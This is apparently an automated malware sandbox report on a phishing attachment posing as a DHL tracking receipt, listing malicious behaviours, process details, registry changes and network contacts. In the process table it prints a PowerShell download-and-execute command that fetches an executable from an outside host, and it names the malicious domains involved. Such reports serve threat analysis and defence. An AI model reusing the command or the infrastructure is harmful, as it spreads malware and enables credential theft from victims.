| File name: | DHL_TRACKING_RECEIPT.mht |
| Full analysis: | https://app.any.run/tasks/5a87ba9e-68ad-4597-ae26-8d50427df7a5 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | May 15, 2019, 18:09:50 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with CRLF line terminators |
| MD5: | EAC7AF5085936BFF9E4EB3A3C0309ECF |
| SHA1: | 23F6360FC88B29E703DE11489F838F943C5BADA6 |
| SHA256: | 596DA49016CE7166461738C27F27091450E54E4AFE5D53C4D105A6A4F7C6DDE2 |
| SSDEEP: | 6:4Q0kJQQ8a0NNEXW0Yfcvj3VTfCQ9MfzCjSRPbowvn:4Q0AQQYf2j3VTr9ezCjbwv |
MALICIOUS
Changes settings of System certificates
- mshta.exe (PID: 2564)
Changes the autorun value in the registry
- bgl.exe (PID: 940)
Application was dropped or rewritten from another process
- bgl.exe (PID: 940)
- bgl.exe (PID: 4044)
- created.exe (PID: 3608)
Actions looks like stealing of personal data
- RegSvcs.exe (PID: 1520)
Downloads executable files from the Internet
- powershell.exe (PID: 2256)
Executes PowerShell scripts
- cmd.exe (PID: 3684)
SUSPICIOUS
Executable content was dropped or overwritten
- powershell.exe (PID: 2256)
- created.exe (PID: 3608)
Drop AutoIt3 executable file
- created.exe (PID: 3608)
Reads Windows Product ID
- RegSvcs.exe (PID: 1520)
Loads DLL from Mozilla Firefox
- RegSvcs.exe (PID: 1520)
Reads Environment values
- RegSvcs.exe (PID: 1520)
Adds / modifies Windows certificates
- mshta.exe (PID: 2564)
Starts CMD.EXE for commands execution
- mshta.exe (PID: 2564)
Creates files in the user directory
- powershell.exe (PID: 2256)
INFO
Reads Internet Cache Settings
- iexplore.exe (PID: 2144)
- iexplore.exe (PID: 3960)
- iexplore.exe (PID: 2632)
Reads Microsoft Office registry keys
- iexplore.exe (PID: 3960)
Creates files in the user directory
- iexplore.exe (PID: 2632)
- iexplore.exe (PID: 2144)
Reads internet explorer settings
- iexplore.exe (PID: 2144)
- mshta.exe (PID: 2564)
- iexplore.exe (PID: 2632)
Application launched itself
- iexplore.exe (PID: 3960)
Changes internet zones settings
- iexplore.exe (PID: 3960)
Changes settings of System certificates
- iexplore.exe (PID: 3960)
Reads settings of System Certificates
- iexplore.exe (PID: 3960)
Dropped object may contain Bitcoin addresses
- created.exe (PID: 3608)
- bgl.exe (PID: 4044)
Adds / modifies Windows certificates
- iexplore.exe (PID: 3960)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
45
Monitored processes
11
Malicious processes
7
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 940 | C:\Users\admin\AppData\Local\Temp\51134005\bgl.exe C:\Users\admin\AppData\Local\Temp\51134005\EELRU | C:\Users\admin\AppData\Local\Temp\51134005\bgl.exe | bgl.exe | ||||||||||||
User: admin Company: AutoIt Team Integrity Level: MEDIUM Description: AutoIt v3 Script Exit code: 0 Version: 3, 3, 14, 5 Modules
| |||||||||||||||
| 1520 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | bgl.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft .NET Services Installation Utility Exit code: 0 Version: 4.6.1055.0 built by: NETFXREL2 Modules
| |||||||||||||||
| 2144 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3960 CREDAT:79873 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2256 | powershell (new-object System.Net.WebClienT).DownloadFile('http://www.olympusmotel.com.br/new/el.exe','C:\Users\admin\AppData\Local\Temp\created.exe'); Start 'C:\Users\admin\AppData\Local\Temp\created.exe' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2468 | C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503} | C:\Windows\system32\DllHost.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: COM Surrogate Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2564 | C:\Windows\System32\mshta.exe -Embedding | C:\Windows\System32\mshta.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2632 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3960 CREDAT:137473 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3608 | "C:\Users\admin\AppData\Local\Temp\created.exe" | C:\Users\admin\AppData\Local\Temp\created.exe | powershell.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 3684 | "C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('http://www.olympusmotel.com.br/new/el.exe','%temp%\created.exe'); Start '%temp%\created.exe' | C:\Windows\System32\cmd.exe | — | mshta.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3960 | "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\DHL_TRACKING_RECEIPT.mht | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
Total events
1 687
Read events
1 488
Write events
193
Delete events
6
Modification events
| (PID) Process: | (3960) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main |
| Operation: | write | Name: | CompatibilityFlags |
Value: 0 | |||
| (PID) Process: | (3960) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
| (PID) Process: | (3960) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 1 | |||
| (PID) Process: | (3960) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones |
| Operation: | write | Name: | SecuritySafe |
Value: 1 | |||
| (PID) Process: | (3960) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
| (PID) Process: | (3960) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
| Operation: | write | Name: | SavedLegacySettings |
Value: 4600000071000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000 | |||
| (PID) Process: | (3960) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active |
| Operation: | write | Name: | {AA24B50D-773C-11E9-A370-5254004A04AF} |
Value: 0 | |||
| (PID) Process: | (3960) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore |
| Operation: | write | Name: | Type |
Value: 4 | |||
| (PID) Process: | (3960) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore |
| Operation: | write | Name: | Count |
Value: 1 | |||
| (PID) Process: | (3960) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore |
| Operation: | write | Name: | Time |
Value: E307050003000F0012000A0006006401 | |||
Executable files
2
Suspicious files
3
Text files
74
Unknown types
5
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3960 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
| 3960 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
| 2144 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019051520190516\index.dat | dat | |
MD5:— | SHA256:— | |||
| 2144 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\wbk43D5.tmp | text | |
MD5:— | SHA256:— | |||
| 2632 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | |
MD5:— | SHA256:— | |||
| 2632 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\0ZNSKQTC\DHL_TRACKING_RECEIPT[1].hta | html | |
MD5:— | SHA256:— | |||
| 3960 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF8229023D80669068.TMP | — | |
MD5:— | SHA256:— | |||
| 2632 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | dat | |
MD5:— | SHA256:— | |||
| 2632 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012019051520190516\index.dat | dat | |
MD5:— | SHA256:— | |||
| 2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0AT6S8MQQQJ66FX4LNAL.temp | — | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
5
DNS requests
4
Threats
3
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2256 | powershell.exe | GET | 200 | 187.49.226.17:80 | http://www.olympusmotel.com.br/new/el.exe | BR | executable | 1.06 Mb | suspicious |
3960 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
2632 | iexplore.exe | 190.107.177.57:443 | blancoabogados.cl | Gtd Internet S.A. | CL | unknown |
2564 | mshta.exe | 190.107.177.57:443 | blancoabogados.cl | Gtd Internet S.A. | CL | unknown |
2256 | powershell.exe | 187.49.226.17:80 | www.olympusmotel.com.br | Linha Livre Internet Ltda | BR | suspicious |
1520 | RegSvcs.exe | 68.65.122.52:26 | mail.globalfinancel.com | Namecheap, Inc. | US | malicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
www.bing.com |
| whitelisted |
blancoabogados.cl |
| unknown |
www.olympusmotel.com.br |
| suspicious |
mail.globalfinancel.com |
| malicious |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2256 | powershell.exe | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |
2256 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2256 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |